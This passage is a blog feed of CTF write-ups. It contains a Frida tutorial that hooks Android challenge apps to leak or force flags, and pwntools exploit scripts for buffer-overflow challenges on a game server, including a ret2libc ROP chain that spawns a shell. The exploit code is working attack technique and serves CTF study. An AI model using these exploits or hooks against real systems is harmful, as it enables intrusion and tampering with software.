function_">hook</span>(<span class="hljs-params"></span>){<br> <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">choose</span>(<span class="hljs-string">'com.ad2001.frida0x7.MainActivity'</span>,{<br> <span class="hljs-attr">onMatch</span>:<span class="hljs-keyword">function</span> (<span class="hljs-params">MainActivity</span>){<br> <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">'hook success'</span>)<br><br> <span class="hljs-keyword">var</span> <span class="hljs-title class_">Checker</span> = <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">use</span>(<span class="hljs-string">"com.ad2001.frida0x7.Checker"</span>);<br> <span class="hljs-keyword">var</span> <span class="hljs-title class_">Checker</span>_obj = <span class="hljs-title class_">Checker</span>.$new(<span class="hljs-number">600</span>,<span class="hljs-number">600</span>);<br> <span class="hljs-title class_">MainActivity</span>.<span class="hljs-title function_">flag</span>(<span class="hljs-title class_">Checker</span>_obj)<br> },<br> <span class="hljs-attr">onComplete</span>:<span class="hljs-keyword">function</span> (<span class="hljs-params"></span>){} <span class="hljs-comment">// Java.choose calls onComplete once the heap scan ends, so it must be defined</span><br> })<br><br>}<br><span class="hljs-keyword">function</span> <span class="hljs-title function_">main</span>(<span class="hljs-params"></span>){<br> <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">perform</span>(<span class="hljs-keyword">function</span> (<span class="hljs-params"></span>){<br> <span class="hljs-title function_">hook</span>();<br> })<br>}<br><br><span class="hljs-comment">// setImmediate(main);</span><br><span class="hljs-built_in">setTimeout</span>(main,<span class="hljs-number">1000</span>);<br></code></pre></td></tr></table></figure><h2 id="Frida-0x8"><a href="#Frida-0x8" class="headerlink" title="Frida 0x8"></a>Frida 0x8</h2><h3 id="Hook-Native层中调用的函数并且读取传入的参数"><a href="#Hook-Native层中调用的函数并且读取传入的参数" class="headerlink" title="Hook Native层中调用的函数并且读取传入的参数"></a>Hook 
a function called in the native layer and read the arguments passed to it</h3><p>This challenge targets the native layer. For hooking native-layer functions we use the following template:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-title class_">Interceptor</span>.<span class="hljs-title function_">attach</span>(targetAddress, {<br> <span class="hljs-attr">onEnter</span>: <span class="hljs-keyword">function</span> (<span class="hljs-params">args</span>) {<br> <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">'Entering '</span> + functionName);<br> <span class="hljs-comment">// Modify or log arguments if needed</span><br> },<br> <span class="hljs-attr">onLeave</span>: <span class="hljs-keyword">function</span> (<span class="hljs-params">retval</span>) {<br> <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">'Leaving '</span> + functionName);<br> <span class="hljs-comment">// Modify or log return value if needed</span><br> }<br>});<br></code></pre></td></tr></table></figure><ul><li><code>Interceptor.attach</code>: attaches the callbacks to the given function address. <code>targetAddress</code> should be the address of the native function we want to hook.</li><li><code>onEnter</code>: called when the hooked function is invoked. It gives access to the function's arguments (<code>args</code>).</li><li><code>onLeave</code>: called when the hooked function is about to return. It gives access to the return value (<code>retval</code>).</li></ul><p>To obtain targetAddress we can conveniently use the following APIs:</p><ol><li><code>Module.enumerateExports()</code><br>By calling Module.enumerateExports() we get the names, addresses and other details of the exported functions. This information is very useful for hooking functions, tracing them, or calling other functions.</li><li><code>Module.getExportByName()</code><br>When we know the name of the export we are looking for but not its address, we can use 
Module.getExportByName(). Given the export's name as its argument, this function returns the address of the export with that name.</li><li><code>Module.findExportByName()</code><br>This is the same as Module.getExportByName(). The only difference is that Module.getExportByName() throws an exception if the export is not found, whereas Module.findExportByName() returns <code>null</code> in that case. Let's look at an example.</li><li><code>Module.getBaseAddress()</code><br>By calling Module.getBaseAddress() we get the base address of the given module; from that base we can compute offsets to locate specific functions, variables or data structures inside the module.</li><li><code>Module.enumerateImports()</code><br>By calling Module.enumerateImports() we get the names, addresses and other details of the external functions or variables imported by the given module.</li></ol><p><img src="/./assets/image-20240604144832222.png" alt="image-20240604144832222"></p><p><img src="/./assets/image-20240604144849140.png" alt="image-20240604144849140"></p><p>We can see that the first argument of strcmp is our input and the second is the flag, so all we need to do is hook this function.</p><p>I am not quite sure why my enumerate call shows no output.</p><p><img src="/./assets/image-20240604150254748.png" alt="image-20240604150254748"></p><p>Once we have found the function in IDA, we can use the get and find APIs to obtain its address.</p><p><img src="/./assets/image-20240604150008695.png" alt="image-20240604150008695"></p><p>getBaseAddress is for when we do not know the function name: find the base address, read the offset in IDA, and add the offset to the base.</p><p><img src="/./assets/image-20240604150146569.png" alt="image-20240604150146569"></p><p><img src="/./assets/image-20240604150221656.png" alt="image-20240604150221656"></p><p>The procedure is: once we have the address, we can hook it with the template.</p><p>We can use Memory.readUtf8String(args[0]); to obtain our input string, and use if (input.includes("111")) to check it.</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span 
class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">function</span> <span class="hljs-title function_">hook</span>(<span class="hljs-params"></span>){<br> <span class="hljs-keyword">var</span> strcmp_adr = <span class="hljs-title class_">Module</span>.<span class="hljs-title function_">findExportByName</span>(<span class="hljs-string">"libc.so"</span>, <span class="hljs-string">"strcmp"</span>);<br> <span class="hljs-title class_">Interceptor</span>.<span class="hljs-title function_">attach</span>(strcmp_adr, {<br> <span class="hljs-attr">onEnter</span>: <span class="hljs-keyword">function</span> (<span class="hljs-params">args</span>) {<br> <span class="hljs-keyword">var</span> arg0 = <span class="hljs-title class_">Memory</span>.<span class="hljs-title function_">readUtf8String</span>(args[<span class="hljs-number">0</span>]); <span class="hljs-comment">// first argument</span><br> <span class="hljs-keyword">var</span> flag = <span class="hljs-title class_">Memory</span>.<span class="hljs-title function_">readUtf8String</span>(args[<span class="hljs-number">1</span>]); <span class="hljs-comment">// second argument</span><br> <span class="hljs-keyword">if</span> (arg0.<span class="hljs-title function_">includes</span>(<span class="hljs-string">"Hello"</span>)) {<br><br> <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">"Hookin the strcmp function"</span>);<br> <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">"Input "</span> + arg0);<br> <span class="hljs-variable language_">console</span>.<span 
class="hljs-title function_">log</span>(<span class="hljs-string">"The flag is "</span>+ flag);<br><br> }<br> },<br> <span class="hljs-attr">onLeave</span>: <span class="hljs-keyword">function</span> (<span class="hljs-params">retval</span>) {<br> <span class="hljs-comment">// Modify or log return value if needed</span><br> }<br> });<br>}<br><span class="hljs-keyword">function</span> <span class="hljs-title function_">main</span>(<span class="hljs-params"></span>){<br> <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">perform</span>(<span class="hljs-keyword">function</span> (<span class="hljs-params"></span>){<br> <span class="hljs-title function_">hook</span>();<br> })<br>}<br><br><span class="hljs-comment">// setImmediate(main);</span><br><span class="hljs-built_in">setTimeout</span>(main,<span class="hljs-number">1000</span>);<br></code></pre></td></tr></table></figure><h2 id="Frida-0x9"><a href="#Frida-0x9" class="headerlink" title="Frida 0x9"></a>Frida 0x9</h2><h3 id="Hook修改native层程序返回值"><a href="#Hook修改native层程序返回值" class="headerlink" title="Hook修改native层程序返回值"></a>Hooking and modifying a native-layer function's return value</h3><p>The hook template:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-title class_">Interceptor</span>.<span class="hljs-title function_">attach</span>(functionaddr, {<br> <span class="hljs-attr">onEnter</span>: <span class="hljs-keyword">function</span> (<span class="hljs-params">args</span>) {<br> <br> },<br> <span class="hljs-attr">onLeave</span>: <span class="hljs-keyword">function</span> (<span class="hljs-params">retval</span>) {<br> <br> 
}<br>});<br></code></pre></td></tr></table></figure><p>In onLeave there is a parameter retval, which is the return value of the hooked function; we can modify it with retval.replace(val).</p><p><img src="/./assets/image-20240604152917826.png" alt="image-20240604152917826"></p><p><img src="/./assets/image-20240604152943922.png" alt="image-20240604152943922"></p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">function</span> <span class="hljs-title function_">hook</span>(<span class="hljs-params"></span>){<br> <span class="hljs-keyword">var</span> adr = <span class="hljs-title class_">Module</span>.<span class="hljs-title function_">findExportByName</span>(<span class="hljs-string">"liba0x9.so"</span>, <span class="hljs-string">"Java_com_ad2001_a0x9_MainActivity_check_1flag"</span>);<br> <span class="hljs-title class_">Interceptor</span>.<span class="hljs-title function_">attach</span>(adr, {<br> <span class="hljs-attr">onEnter</span>: <span class="hljs-keyword">function</span> (<span class="hljs-params">args</span>) {<br> },<br> <span class="hljs-attr">onLeave</span>: <span class="hljs-keyword">function</span> (<span class="hljs-params">retval</span>) {<br> <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">"Origin retval : "</span>,retval);<br> retval.<span 
class="hljs-title function_">replace</span>(<span class="hljs-number">1337</span>);<br> }<br> });<br>}<br><span class="hljs-keyword">function</span> <span class="hljs-title function_">main</span>(<span class="hljs-params"></span>){<br> <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">perform</span>(<span class="hljs-keyword">function</span> (<span class="hljs-params"></span>){<br> <span class="hljs-title function_">hook</span>();<br> })<br>}<br><br><span class="hljs-comment">// setImmediate(main);</span><br><span class="hljs-built_in">setTimeout</span>(main,<span class="hljs-number">1000</span>);<br></code></pre></td></tr></table></figure><h2 id="Frida-0xA"><a href="#Frida-0xA" class="headerlink" title="Frida 0xA"></a>Frida 0xA</h2><h3 id="调用native层中未被调用的方法"><a href="#调用native层中未被调用的方法" class="headerlink" title="调用native层中未被调用的方法"></a>Calling a native-layer method that is never invoked</h3><p>Template:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">var</span> native_adr = <span class="hljs-keyword">new</span> <span class="hljs-title class_">NativePointer</span>(&lt;address_of_the_native_function&gt;);<br><span class="hljs-keyword">const</span> native_function = <span class="hljs-keyword">new</span> <span class="hljs-title class_">NativeFunction</span>(native_adr, <span class="hljs-string">'&lt;return type&gt;'</span>, [<span class="hljs-string">'argument_data_type'</span>]);<br><span class="hljs-title function_">native_function</span>(&lt;<span class="hljs-variable language_">arguments</span>&gt;);<br></code></pre></td></tr></table></figure><blockquote><p>Let me explain line by line.</p><p><code>var native_adr = new NativePointer(&lt;address_of_the_native_function&gt;);</code></p><p>To call a native function from Frida we need a <code>NativePointer</code> object. We pass the address of the native function we want to call to the <code>NativePointer</code> constructor. Next, we create a 
<code>NativeFunction</code> object, which represents the actual native function we want to call. It creates a JavaScript wrapper around the native function that lets us call it from Frida.</p><p><code>const native_function = new NativeFunction(native_adr, '&lt;return type&gt;', ['argument_data_type']);</code></p><p>The first argument should be the <code>NativePointer</code> object, the second is the return type of the native function, and the third is the list of data types of the arguments to pass to it. Now we can call the method just as we would in the Java world.</p><p><code>native_function(&lt;arguments&gt;);</code></p></blockquote><p>There is nothing useful in the apk, and the main function in the .so file has nothing useful either, but we find a function that prints the flag, so we can try calling it.</p><p><img src="/./assets/image-20240604163528916.png" alt="image-20240604163528916"></p><p><img src="/./assets/image-20240604163651152.png" alt="image-20240604163651152"></p><p><img src="/./assets/image-20240604163702086.png" alt="image-20240604163702086"></p><h2 id="Frida-0xB"><a href="#Frida-0xB" class="headerlink" title="Frida 0xB"></a>Frida 0xB</h2><h3 id="更改Native层方法的汇编指令"><a href="#更改Native层方法的汇编指令" class="headerlink" title="更改Native层方法的汇编指令"></a>Patching the assembly instructions of a native-layer method</h3><p>Frida template for the x86 instruction set:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">var</span> writer = <span class="hljs-keyword">new</span> <span class="hljs-title function_">X86Writer</span>(opcodeaddr);<br><span class="hljs-title class_">Memory</span>.<span class="hljs-title function_">protect</span>(opcodeaddr, <span class="hljs-number">0x1000</span>, <span class="hljs-string">"rwx"</span>);<br><span class="hljs-keyword">try</span> {<br> <br> writer.<span class="hljs-title function_">flush</span>();<br> <br>} <span class="hljs-keyword">finally</span> {<br> <br> writer.<span class="hljs-title 
function_">dispose</span>();<br>}<br></code></pre></td></tr></table></figure>]]></content>
<summary type="html"><p><a href="https://bbs.kanxue.com/thread-280758.htm#msg_header_h3_1">[Original] Frida Hook Java-layer operations compendium - Android Security - Kanxue Security Community | Security Jobs | kanxue.com</a></p>
<p><a href="https://bbs.kanxue.com/thread-280812.htm">[Original] Frida Hook Native-layer operations compendium - Android Security - Kanxue Security Community | Security Jobs | kanxue.com</a></p>
<h2 id="Frida-0x1"><a href="#Frida-0x1" class="headerlink" title="Frida 0x1"></a>Frida 0x1</h2><h3 id="修改函数返回值-给函数传自定义参数"><a href="#修改函数返回值-给函数传自定义参数" class="headerlink" title="修改函数返回值&amp;&amp;给函数传自定义参数"></a>Modify a function's return value &amp;&amp; pass custom arguments to a function</h3><p>The program's main logic calls a random function, then checks whether our input is a number; if it is, the check function compares the random number with the number we entered, and the flag is printed if they match.</p>
<p><img src="/./assets/image-20240603150155414.png" alt="image-20240603150155414"></p>
<p>For hooking, we can either hook random directly so that it always returns a fixed value, or hook the check function and pass in the values manually.</p>
<blockquote>
<ul>
<li><code>Java.perform</code> is the Frida function that creates a special context in which your script can interact with the Java code of an Android application. It is like opening a door that lets you reach and manipulate the Java code running inside the app. Once inside this context, you can hook methods or access Java classes to control or observe the application's behaviour.</li>
<li><code>var &lt;class_reference&gt; = Java.use(&quot;&lt;package_name&gt;.&lt;class&gt;&quot;);</code><br>Here you declare a variable <code>&lt;class_reference&gt;</code> that stands for a Java class in the target Android application. You specify the class with the <code>Java.use</code> function, which takes the class name as its argument. <code>&lt;package_name&gt;</code> is the application's package name and <code>&lt;class&gt;</code> is the class you want to interact with.</li>
<li><code>&lt;class_reference&gt;.&lt;method_to_hook&gt;.implementation = function(&lt;args&gt;) &#123;&#125;</code><br>Inside the chosen class, you reach the method you want to hook through the <code>&lt;class_reference&gt;.&lt;method_to_hook&gt;</code> notation. This is where you define your own logic to run whenever the hooked method is called. <code>&lt;args&gt;</code> stands for the arguments passed to the function.</li>
</ul>
</blockquote>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-keyword">function</span> <span class="hljs-title function_">hook</span>(<span class="hljs-params"></span>)&#123;<br> <span class="hljs-keyword">var</span> <span class="hljs-title class_">MainActivity</span> = <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">use</span>(<span class="hljs-string">&quot;com.ad2001.frida0x1.MainActivity&quot;</span>);<br> <span class="hljs-title class_">MainActivity</span>.<span class="hljs-property">get_random</span>.<span class="hljs-property">implementation</span> = <span class="hljs-keyword">function</span> (<span class="hljs-params"></span>)&#123;<br> <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br> &#125;<br>&#125;<br><br><span class="hljs-keyword">function</span> <span class="hljs-title function_">hook2</span>(<span class="hljs-params"></span>)&#123;<br> <span class="hljs-keyword">var</span> <span class="hljs-title class_">Mainactivity</span> = <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">use</span>(<span 
class="hljs-string">&#x27;com.ad2001.frida0x1.MainActivity&#x27;</span>);<br> <span class="hljs-title class_">Mainactivity</span>.<span class="hljs-property">check</span>.<span class="hljs-title function_">overload</span>(<span class="hljs-string">&#x27;int&#x27;</span>,<span class="hljs-string">&#x27;int&#x27;</span>).<span class="hljs-property">implementation</span> = <span class="hljs-keyword">function</span> (<span class="hljs-params">a,b</span>)&#123;<br> a=<span class="hljs-number">0</span>;<br> b=<span class="hljs-number">4</span>;<br> <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">&quot;i1 and i2 = &quot;</span>,a,b);<br> <span class="hljs-keyword">return</span> <span class="hljs-variable language_">this</span>.<span class="hljs-title function_">check</span>(a,b);<br> &#125;<br>&#125;<br><span class="hljs-keyword">function</span> <span class="hljs-title function_">main</span>(<span class="hljs-params"></span>)&#123;<br> <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">perform</span>(<span class="hljs-keyword">function</span> (<span class="hljs-params"></span>)&#123;<br> <span class="hljs-title function_">hook</span>();<br> &#125;)<br>&#125;<br><br><span class="hljs-title function_">setImmediate</span>(main);<br></code></pre></td></tr></table></figure></summary>
</entry>
<entry>
<title>Odd writeups</title>
<link href="https://shenshuoyaoyouguangha.github.io/2023/10/08/%E5%A5%87%E6%80%AA%E7%9A%84wp/"/>
<id>https://shenshuoyaoyouguangha.github.io/2023/10/08/%E5%A5%87%E6%80%AA%E7%9A%84wp/</id>
<published>2023-10-08T13:14:04.000Z</published>
<updated>2023-12-18T05:35:48.007Z</updated>
<content type="html"><![CDATA[<h4 id="PWN1"><a href="#PWN1" class="headerlink" title="PWN1"></a>PWN1</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-comment"># p = process('./ezshellcode')</span><br>p = remote(<span class="hljs-string">'pwn.node.game.sycsec.com'</span>,<span class="hljs-number">30213</span>)<br>context(arch=<span class="hljs-string">'amd64'</span>, os=<span class="hljs-string">'linux'</span>)<br>context.log_level = <span class="hljs-string">'DEBUG'</span><br><br><br><br>p.recvuntil(<span class="hljs-string">b'my heart'</span>)<br>p.sendline(<span class="hljs-string">b'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaSyclover'</span>)<br><br>p.recvuntil(<span class="hljs-string">b'challege!'</span>)<br>p.recvline()<br>p.recvline()<br>a=p.recvline().decode(<span class="hljs-string">'utf-8'</span>)<br>a = a[<span class="hljs-number">0</span>:-<span class="hljs-number">3</span>]<br><span class="hljs-built_in">print</span>(<span class="hljs-number">6666666666</span>)<br><span class="hljs-built_in">print</span>(a)<br>r = <span 
class="hljs-built_in">eval</span>(a)<br>p.sendline(<span class="hljs-built_in">str</span>(r))<br>p.interactive()<br></code></pre></td></tr></table></figure><h2 id="ret2text"><a href="#ret2text" class="headerlink" title="ret2text"></a>ret2text</h2><p>PIE, brute-forced by hand; the padding length is not 0x50.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>context.log_level = <span class="hljs-string">'debug'</span><br><br><span class="hljs-comment"># context.terminal = ['gnome-terminal', '-x', 'sh', '-c']</span><br><span class="hljs-comment"># r = gdb.debug('./ret2text')</span><br><span class="hljs-comment"># r = process('./ret2text')</span><br><br>r = remote(<span class="hljs-string">'pwn.node.game.sycsec.com'</span>,<span 
class="hljs-number">31949</span>)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">debug</span>():<br> gdb.attach(r)<br> pause()<br>elf = ELF(<span class="hljs-string">'ret2text'</span>)<br>se = <span class="hljs-keyword">lambda</span> data :r.send(data)<br>sa = <span class="hljs-keyword">lambda</span> delim,data :r.sendafter(delim, data)<br>sl = <span class="hljs-keyword">lambda</span> data :r.sendline(data)<br>sla = <span class="hljs-keyword">lambda</span> delim,data :r.sendlineafter(delim, data)<br>sea = <span class="hljs-keyword">lambda</span> delim,data :r.sendafter(delim, data)<br>rc = <span class="hljs-keyword">lambda</span> numb=<span class="hljs-number">4096</span> :r.recv(numb)<br>rl = <span class="hljs-keyword">lambda</span> :r.recvline()<br>ru = <span class="hljs-keyword">lambda</span> delims :r.recvuntil(delims)<br>uu32 = <span class="hljs-keyword">lambda</span> data :u32(data.ljust(<span class="hljs-number">4</span>, <span class="hljs-string">b'\0'</span>))<br>uu64 = <span class="hljs-keyword">lambda</span> data :u64(data.ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b'\0'</span>))<br>lic = <span class="hljs-keyword">lambda</span> data :uu64(ru(data)[-<span class="hljs-number">6</span>:])<br>padding = <span class="hljs-keyword">lambda</span> lenth :<span class="hljs-string">b'Yhuan'</span>*(lenth//<span class="hljs-number">5</span>)+<span class="hljs-string">b'Y'</span>*(lenth % <span class="hljs-number">5</span>)<br>it = <span class="hljs-keyword">lambda</span> :r.interactive()<br><br>pad = p64(<span class="hljs-number">0</span>)*<span class="hljs-number">9</span> + p64(<span class="hljs-number">1</span>)<br>backdoor = <span class="hljs-string">b'\x27\xA2'</span><br><br>pl1 = pad + p64(<span class="hljs-number">0</span>) + backdoor<br>se(pl1)<br><br>r.interactive()<br></code></pre></td></tr></table></figure><span id="more"></span> <h2 id="ret2libc"><a href="#ret2libc" class="headerlink" 
title="ret2libc"></a>ret2libc</h2><p>libcsearcher</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#coding:utf-8</span><br><span 
class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span>*<br><span class="hljs-comment"># sh = process('./chal')</span><br>sh = remote(<span class="hljs-string">'pwn.node.game.sycsec.com'</span>,<span class="hljs-number">31971</span>)<br>elf = ELF(<span class="hljs-string">'./chal'</span>)<br><span class="hljs-comment"># libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')</span><br><span class="hljs-comment"># libc = ELF('../../tools/libc-database/db/libc6_2.23-0ubuntu10_amd64.so')</span><br><span class="hljs-comment"># libc = ELF('libc.so.6')</span><br>context(arch=<span class="hljs-string">'amd64'</span>, os=<span class="hljs-string">'linux'</span>)<br>context.log_level = <span class="hljs-string">'DEBUG'</span><br><span class="hljs-comment"># context.terminal = ['tmux','splitw','-h']</span><br>gadgets1 = <span class="hljs-number">0x000000000040132A</span><br>gadgets2 = <span class="hljs-number">0x0000000000401310</span><br>write_got = elf.got[<span class="hljs-string">'write'</span>]<br>main_addr = elf.symbols[<span class="hljs-string">'main'</span>]<br>offset = <span class="hljs-string">b'\0'</span>*(<span class="hljs-number">0x10</span>+<span class="hljs-number">8</span>)<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">csu</span>(<span class="hljs-params">r12,r13,r14,r15,ret_addr</span>):<br> payload = offset<br> payload += p64(gadgets1)<br> <span class="hljs-comment"># payload += b"\0"*8</span><br> payload += p64(<span class="hljs-number">0</span>)<br> payload += p64(<span class="hljs-number">1</span>)<br> payload += p64(r12)<br> payload += p64(r15)<br> payload += p64(r14)<br> payload += p64(r13)<br> payload += p64(gadgets2) <br> payload += <span class="hljs-string">b"\0"</span>*<span class="hljs-number">56</span><br> payload += p64(ret_addr)<br> sh.sendline(payload)<br><span class="hljs-comment"># 
sh.recvuntil("this\n")</span><br>csu(<span class="hljs-number">1</span>,write_got,<span class="hljs-number">8</span>,write_got,main_addr)<br>write_addr = u64(sh.recvuntil(<span class="hljs-string">b'\x7f'</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b'\0'</span>))<br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">hex</span>(write_addr))<br><span class="hljs-comment"># offset_addr = write_addr - libc.symbols['write']</span><br><span class="hljs-comment"># success("offset_addr = 0x%x",offset_addr)</span><br>libc = LibcSearcher(<span class="hljs-string">'write'</span>,write_addr)<br>base = write_addr - libc.dump(<span class="hljs-string">'write'</span>)<br>system = base + libc.dump(<span class="hljs-string">'system'</span>)<br>binsh = base + libc.dump(<span class="hljs-string">'str_bin_sh'</span>)<br><span class="hljs-comment"># print("123"+libc.dump('str_bin_sh'))</span><br><span class="hljs-comment"># system_addr = offset_addr + libc.symbols['system']</span><br><span class="hljs-comment"># print("execve:",hex(system_addr))</span><br><span class="hljs-comment"># binsh_address = next(libc.search(b'/bin/sh\x00'))</span><br><span class="hljs-comment"># print("binsh:",hex(binsh_address))</span><br><span class="hljs-comment">#gdb.attach(sh)</span><br>sh.recvuntil(<span class="hljs-string">"this\n"</span>)<br>payload = offset<br>payload+= p64(<span class="hljs-number">0x000000000040101a</span>)<span class="hljs-comment">#ret_addr</span><br>payload+= p64(<span class="hljs-number">0x0000000000401333</span>)<span class="hljs-comment"># pop_rdi_ret</span><br>payload+= p64(binsh)<br>payload+= p64(system)<br>sh.sendline(payload)<br>sh.interactive()<br></code></pre></td></tr></table></figure><p>Solved with the provided libc:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span 
